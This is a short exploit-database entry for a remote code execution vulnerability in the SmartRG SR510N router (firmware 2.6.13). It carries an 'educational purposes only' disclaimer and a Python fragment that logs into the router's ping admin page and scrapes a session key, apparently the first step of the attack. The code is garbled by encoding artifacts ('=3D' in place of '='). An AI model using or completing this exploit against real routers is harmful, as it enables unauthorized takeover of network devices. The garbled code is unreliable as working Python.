Exploits / Vulnerability Discovered : 2022-11-11 |
Type : remote |
Platform : hardware
This exploit / vulnerability Smartrg router sr510n 2.6.13 remote code execution is for educational purposes only and if it is used you will do on your own risk!
def get_session():
url =3D router_host + "/admin/ping.html"
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
r =3D requests.get(url, headers=3Dheaders).text
i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
s =3D ""
while r[i] !=3D "'":
s =3D s + r[i]
i =3D i + 1
return s